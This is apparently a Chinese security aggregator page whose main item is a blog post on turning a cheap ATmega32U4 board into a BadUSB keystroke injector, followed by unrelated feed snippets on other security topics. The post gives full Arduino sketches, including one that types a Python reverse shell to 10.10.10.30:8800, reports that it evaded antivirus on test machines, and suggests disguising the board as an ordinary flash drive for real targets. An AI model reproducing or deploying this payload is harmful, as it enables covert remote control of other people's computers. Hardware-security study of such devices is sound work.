Aggregator

序

板子用的beetle usb atmega32u4

自带usb接口，比较便宜，以前看过多款badusb的板子，但是都因为比较贵而放弃，直到前两天hx说了这个板子也可以，于是果断下单。

板子类型选择arduino leonardo，编译上传即可

上手试玩

代码很简单，一看就懂。

windows弹计算器 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 #include <Keyboard.h> void setup() { // put your setup code here, to run once: Keyboard.begin(); delay(2000); Keyboard.press(KEY_LEFT_GUI); delay(50); Keyboard.press('r'); delay(50); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); delay(50); Keyboard.println("calc"); delay(50); Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); delay(50); } void loop() { // put your main code here, to run repeatedly: } ubuntu 开终端 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 #include <Keyboard.h> void setup() { // put your setup code here, to run once: Keyboard.begin(); delay(2000); /* Keyboard.press(KEY_LEFT_CTRL); delay(500); Keyboard.press(KEY_LEFT_ALT); delay(500); Keyboard.press('T'); delay(500); Keyboard.release('T'); */ Keyboard.press(KEY_LEFT_GUI); delay(500); Keyboard.release(KEY_LEFT_GUI); delay(500); Keyboard.println("term"); delay(500); Keyboard.press(KEY_RETURN); delay(500); Keyboard.release(KEY_RETURN); Keyboard.println("echo hacked"); delay(500); Keyboard.press(KEY_RETURN); delay(500); Keyboard.release(KEY_RETURN); delay(50); } void loop() { // put your main code here, to run repeatedly: } ubuntu反弹shell 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 #include <Keyboard.h> void setup() { // put your setup code here, to run once: Keyboard.begin(); delay(2000); /* Keyboard.press(KEY_LEFT_CTRL); delay(500); Keyboard.press(KEY_LEFT_ALT); delay(500); Keyboard.press('T'); delay(500); Keyboard.release('T'); */ Keyboard.press(KEY_LEFT_GUI); delay(500); Keyboard.release(KEY_LEFT_GUI); delay(500); Keyboard.println("term"); delay(500); Keyboard.press(KEY_RETURN); delay(500); Keyboard.release(KEY_RETURN); Keyboard.println("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.10.30\",8800));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);' "); delay(500); Keyboard.press(KEY_RETURN); delay(500); Keyboard.release(KEY_RETURN); delay(50); } void loop() { // put your main code here, to run repeatedly: } 跋

代码异常简单，执行过程也毫不隐蔽，难点在于如何把做好的板子插到目标设备上 :)

模拟的键盘设备，试过了5台电脑，其中三台win10有杀软，两台ubuntu，全部正常运行，没有遇到拦截的情况。

如果有恶意命令，可能会被拦截，似乎火绒会拦截命令行创建用户的命令

板子模拟键盘操作关掉杀软也是可以的 :) 然而暂时没想到如何用键盘快捷键关掉杀软。在执行过程中模拟点击允许该程序执行、同意UAC可能也是可以的。

淘宝上这款板子有的是带壳子的，外观就是一个普通的优盘。如果实战使用的话可能更好。

Les1ie

2019年8月7日09:35:43

网页加载js步骤1、浏览器一边下载html网页，一边开始解析（不等下载完就解析）2、遇到<script>标签，暂停解析，网页渲染的控制权交给javascript引擎3、如果<script>标签引用了外部脚本，先下载在执行，否则直接执行4、执行完毕，控制权交还渲染引擎，继续往下解析html网页注意：有

This episode in The Hunt for IoT Volume 6 series focuses on the threat actors building IoT botnets, how easy IoT devices are to exploit, recent thingbot discoveries, and the status of Mirai infections worldwide.

第一次做哈希长度拓展攻击的题目，记录一下

查看shell列表 如果发现没有zsh就安装 安装zsh 设置默认shell 重启主机 查看当前默认shell 确认zsh是否为默认shell 安装oh my zsh 安装zsh syntax highlighting插件 安装字体 oh my zsh会有许多符号来美化终端界面,所以安装一些支持多样

前言 2019 工控安全比赛第一场的一道固件逆向的题目，好像也比较简单，好多人都做出来了。这里就分别从静态和动态调试分析复现一下这个命令执行的洞。 赛题说明 题目给的场景倒是挺真实的：路由器在处理 tddp 协议时出现了命令注入，导致了远程命令执行。就是后面做出来的这个答案的格式咋提交都不对...

对于采用 intent 参数的 Activity Manager 命令，您可以使用以下选项指定 intent：

Kazakhstan is now asking its citizens to install digital certificates so that it can decrypt all online communications. Their methods, however, may leave the population vulnerable to cyber attacks for many years to come.

在 "XposedBridge源码" 中,反射字段的方法封装在 类里面.下面来看看Xposed是如何获取和设置字段的值的 获取字段的值 获取字段的值有许多个方法,有获取基本类型字段的值的方法(getIntField,getLongField,getDoubleField...),也有获取对象类型字段

MLSRC与你相约第四届SSC安全峰会

Similar to April and May, threat actors in June continued targeting the deserialization vulnerabilities found in Oracle WebLogic to mine cryptocurrency.

不想说小红书，无他，有容乃大~

At Akamai, we believe innovation is only possible when the various viewpoints and experiences of a collective, culminate to make a great idea. It is the variety of these ideas which is important. Why does diversity of thought matter? When...

What you need to know before buying artificially intelligent security products

In June 2019, logs on my personal website recorded markers that were clearly Remote File Inclusion (RFI) vulnerability attempts. The investigation into the attempts uncovered a campaign of targeted RFI attacks that currently are being leveraged to deploy phishing kits....